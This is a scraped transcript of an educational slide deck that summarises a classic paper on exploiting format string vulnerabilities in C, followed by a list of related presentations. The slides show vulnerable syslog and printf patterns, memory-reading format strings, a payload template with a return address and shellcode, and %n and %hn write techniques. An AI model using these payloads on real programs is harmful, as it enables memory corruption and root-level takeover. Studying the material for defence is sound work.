Presentation is loading. Please wait.

Presentation is loading. Please wait.

Exploiting Format String Vulnerabilities

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Exploiting Format String Vulnerabilities"— Presentation transcript:

1 Exploiting Format String Vulnerabilities
Scut/team teso

2 Outline Introduction The format functions
Format string vulnerabilities Variations of Exploitation Conclusion

3 Introduction Buffer Overflow vs. Format String Buffer Overflow
Buffer Overflow Format String public since mid 1980's June 1999 danger realized 1990's June 2000 number of exploits a few thousand a few dozen considered as security threat programming bug techniques evolved and advanced basic techniques visibility sometimes very difficult to spot easy to find

4 Introduction(Cont.) Statistics Application Found by Impact years
wu-ftpd 2.* security.is remote root > 6 Linux rpc.statd > 4 IRIX telnetd LSD > 8 Qualcomm Popper 2.53 remote user > 3 Apache + PHP3 > 2 NLS / locale CORE SDI local root ? screen Jouko Pynn_onen > 5 BSD chpass TESO OpenBSD fstat ktwo

5 The Format functions Functionality
used to convert simple C datatypes to a string representation allow to specify the format of the representation process the resulting string (output to stderr, stdout, syslog, ...)

6 The Format Functions(Cont.)
How the format function works the format string controls the behaviour of the function it specifies the type of parameters that should be printed parameters are saved on the stack (pushed) saved either directly (by value), or indirectly (by reference)

7 The Format Functions(Cont)
The calling function has to know how many parameters it pushes to the stack, since it has to do the stack correction, when the format function returns

8 The Format Functions(Cont)
Some format parameters parameter output passed as %d decimal (int) value %u unsigned decimal (unsigned int) %x hexadecimal (unsigned int) %s string ((const) (unsigned) char *) reference %n number of bytes written so far, (* int)

9 The Format Funtions(Cont)
The stack and its role at format strings printf ("Number %d has no address, number %d has:%08x\n“ , i, a, &a); A address of the format string i value of the variable i a value of the variable a &a address of the variable i

10 Format String Vulnerabilities
Vulnerable Type Viewing Process Memory Exploitation

11 Vulnerable Type Type 1: Type 2: int Error (char *fmt, ...);
char tmpbuf[512]; snprintf (tmpbuf, sizeof (tmpbuf), "foo: %s", user); tmpbuf[sizeof (tmpbuf) - 1] = ’\0’; syslog (LOG_NOTICE, tmpbuf); Type 2: int Error (char *fmt, ...); int someotherfunc (char *user) { Error (user); }

12 Vulnerable Type(Solution)
pscan or TESOgcc tools Type 2: Manual check if format funtion or not.

13 Viewing Process Memory
printf(“AAA0_%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x“); AAA0_ d f.30252e78.252e7838 .2e783830

14 Exploitation Primarily concept: to change return address (Instrument Pointer). Exploit method Similar to common buffer overflows Through pure format strings

15 Similar to common buffer overflows
{ char outbuf[512]; char buffer[512]; sprintf (buffer, "ERR Wrong command: %400s", user); sprintf (outbuf, buffer); } We assign user = "%497d\x3c\xd3\xff\xbf<nops><shellcode>" write a return address (0xbfffd33c)

16 Through pure format strings
printf(“AAA0_%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n“); The %n writes to the address 0x that is represented by the string “AAA0” So we can use “\xc0\xc8\xff\xbf” to replace “AAA0”

17 Through pure format strings
unsigned char canary[5]; unsigned char foo[4]; memset (foo, ’\x00’, sizeof (foo)); /* 0 * before */ strcpy (canary, "AAAA"); /* 1 */ printf ("%16u%n", 7350, (int *) &foo[0]); /* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]); /* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]); /* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]); /* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);

18 Through pure format strings

19 Through pure format strings
strcpy (canary, "AAAA"); printf ("%16u%n%16u%n%32u%n%64u%n", 1, (int *) &foo[0], 1, (int *) &foo[1], 1, (int *) &foo[2], 1, (int *) &foo[3]); printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);

20 Through pure format strings
Offset pseudocode: write_byte += 0x100; already_written %= 0x100; padding = (write_byte - already_written) % 0x100; if (padding < 10) padding += 0x100;

21 Through pure format strings
<stackpop><dummy-addr-pair * 4><write-code> Stackpop Once the stackpop has been processed,the format function internal stack pointer points to the beginning of the dummy-addr-pair string. Dummy-addr-pair Four pairs of dummy integer values and addresses to write to.The addresses are increasing by one with each pair,and can’t contain NUL bytes.

22 Througn pure format strings
Write-code ‘%n’ is used to write this counter to the addresses that are within the dummy-addr-pair part of string.

23 Variations of Exploitation
Short Write Direct Parameter Access

24 Short Write Use ‘%hn’ to replace ‘%n’
h =>cast the value supplied on the stack to a short type. It does not destroy data beside the address. This is useful for RISC based systems. printf ("%.29010u%hn%.32010u%hn", 1, (short int *) &foo[0], 1, (short int *) &foo[2]);

25 Direct Parameter Access
char foo[4]; printf ("%1$16u%2$n" "%1$16u%3$n" "%1$32u%4$n" "%1$64u%5$n", 1, (int *) &foo[0], (int *) &foo[1], (int *) &foo[2], (int *) &foo[3]);

26 Conclusion Programming bug Easy to find

Download ppt "Exploiting Format String Vulnerabilities"

Similar presentations

©2002, Ed Skoudis Format String Stack View main() { char user_input[100]; char buffer[100]; int x; … /*get user_input*/ … snprintf(buffer, sizeof buffer,

©2002, Ed Skoudis Format String Stack View main() { char user_input[100]; char buffer[100]; int x; … /*get user_input*/ … snprintf(buffer, sizeof buffer,
A C++ Crash Course Part II UW Association for Computing Machinery Questions & Feedback.

A C++ Crash Course Part II UW Association for Computing Machinery Questions & Feedback.
Introduction to C Systems Programming Concepts. Introduction to C A simple C Program A simple C Program –Variable Declarations –printf ( ) Compiling and.

Introduction to C Systems Programming Concepts. Introduction to C A simple C Program A simple C Program –Variable Declarations –printf ( ) Compiling and.
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Pointer Variables The normal variables hold values. For example, int j; j = 2; Then a reference to j in an expression will be identified with the value.

Pointer Variables The normal variables hold values. For example, int j; j = 2; Then a reference to j in an expression will be identified with the value.
Character String Manipulation. Overview Character string functions sscanf() function sprintf() function.

Character String Manipulation. Overview Character string functions sscanf() function sprintf() function.
Character String Manipulation. Overview Character string functions sscanf() function snprintf() function.

Character String Manipulation. Overview Character string functions sscanf() function snprintf() function.
What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.

What is a pointer? First of all, it is a variable, just like other variables you studied So it has type, storage etc. Difference: it can only store the.
SPLINT STATIC CHECKING TOOL Sripriya Subramanian 10/29/2002.

SPLINT STATIC CHECKING TOOL Sripriya Subramanian 10/29/2002.
Exploits Buffer Overflows and Format String Attacks David Brumley Carnegie Mellon University.

Exploits Buffer Overflows and Format String Attacks David Brumley Carnegie Mellon University.
CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson

CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson
Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.

Computer Security: Principles and Practice EECS710: Information Security Professor Hossein Saiedian Fall 2014 Chapter 10: Buffer Overflow.
Pointer, malloc and realloc 1. Name entered was 6 char, not enough space to put null terminator 2 Array of char.

Pointer, malloc and realloc 1. Name entered was 6 char, not enough space to put null terminator 2 Array of char.
Detecting Format String Vulnerabilities with Type Qualifier Umesh Shankar, Kunal Talwar, Jeffrey S. Foster, David Wanger University of California at Berkeley.

Detecting Format String Vulnerabilities with Type Qualifier Umesh Shankar, Kunal Talwar, Jeffrey S. Foster, David Wanger University of California at Berkeley.
Preventing Buffer Overflow Attacks. Some unsafe C lib functions strcpy (char *dest, const char *src) strcat (char *dest, const char *src) gets (char *s)

Preventing Buffer Overflow Attacks. Some unsafe C lib functions strcpy (char *dest, const char *src) strcat (char *dest, const char *src) gets (char *s)
Testing a program Remove syntax and link errors: Look at compiler comments where errors occurred and check program around these lines Run time errors:

Testing a program Remove syntax and link errors: Look at compiler comments where errors occurred and check program around these lines Run time errors:
Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.

Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.
POSIX: Files Introduction to Operating Systems: Discussion 1 Read Solaris System Interface Guide: Ch. 5.1 Basic File I/O.

POSIX: Files Introduction to Operating Systems: Discussion 1 Read Solaris System Interface Guide: Ch. 5.1 Basic File I/O.
Overview Working directly with memory locations is beneficial. In C, pointers allow you to: change values passed as arguments to functions work directly.

Overview Working directly with memory locations is beneficial. In C, pointers allow you to: change values passed as arguments to functions work directly.
A survey of Buffer overflow exploitation on HTC touch mobile phone Advanced Defense Lab CSIE NCU Chih-Wen Ou.

A survey of Buffer overflow exploitation on HTC touch mobile phone Advanced Defense Lab CSIE NCU Chih-Wen Ou.

Similar presentations

Ads by Google